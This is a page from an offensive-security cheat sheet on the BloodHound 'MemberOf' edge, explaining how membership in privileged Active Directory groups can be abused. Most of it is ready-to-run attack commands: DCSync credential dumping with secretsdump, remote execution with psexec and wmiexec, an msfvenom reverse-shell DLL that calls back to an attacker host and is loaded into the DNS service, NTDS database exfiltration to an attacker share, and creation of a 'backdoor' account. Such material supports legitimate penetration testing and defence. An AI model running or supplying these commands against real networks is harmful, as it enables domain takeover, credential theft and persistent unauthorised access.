🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / MemberOf

MemberOf

A principal is a member of a group. This edge is structural β€” it propagates the group's rights to the member.

Applies to: User/Group/Computer β†’ Group

Note

MemberOf is not itself an abuse edge. It means the source object inherits all rights and edges of the target group. The abuse depends on what the group can do.

Common high-value group memberships and their abuse:

Domain Admins / Enterprise Admins

secretsdump (DCSync)

secretsdump.py <domain>/<username>:'<password>'@<dc-ip>
secretsdump.py -hashes :<ntlm-hash> <domain>/<username>@<dc-ip>

wmiexec / psexec to DC

wmiexec.py <domain>/<username>:'<password>'@<dc-ip>
psexec.py <domain>/<username>:'<password>'@<target>

Remote Desktop Users β†’ CanRDP

xfreerdp /u:<username> /p:'<password>' /d:<domain> /v:<target>

Remote Management Users β†’ CanPSRemote

evil-winrm -i <target> -u <username> -p '<password>'

DnsAdmins β†’ DLL injection into DNS service (SYSTEM)

# 1. Build malicious DLL (msfvenom or custom)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f dll -o evil.dll

# 2. Host DLL on SMB share
smbserver.py share /path/to/dir

# 3. Set DNS server plugin (requires dnscmd or PowerShell)
dnscmd <dc-ip> /config /serverlevelplugindll \\<attacker-ip>\share\evil.dll

# 4. Restart DNS service (requires SeRemoteShutdownPrivilege or sc)
sc \\<dc-ip> stop dns
sc \\<dc-ip> start dns

PowerShell (Windows)

dnscmd <dc-ip> /config /serverlevelplugindll \\<attacker-ip>\share\evil.dll
# Then restart DNS:
sc.exe \\<dc-ip> stop dns; sc.exe \\<dc-ip> start dns

Backup Operators β†’ Registry dump / shadow copy for NTDS

# Backup Operators can read NTDS via shadow copy
wbadmin start backup -backuptarget:\\<attacker-ip>\share -include:c:\windows\ntds
# Or use BackupOperatorToDA tooling

Account Operators β†’ Create/modify users and add to groups (except DA/EA)

New-ADUser -Name "backdoor" -AccountPassword (ConvertTo-SecureString '<password>' -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Remote Desktop Users" -Members "backdoor"

Opsec

  • Group membership is resolved at logon token creation β€” changes require new logon to take effect
  • Nested group membership (Group A MemberOf Group B) also propagates β€” check all ancestor groups in BloodHound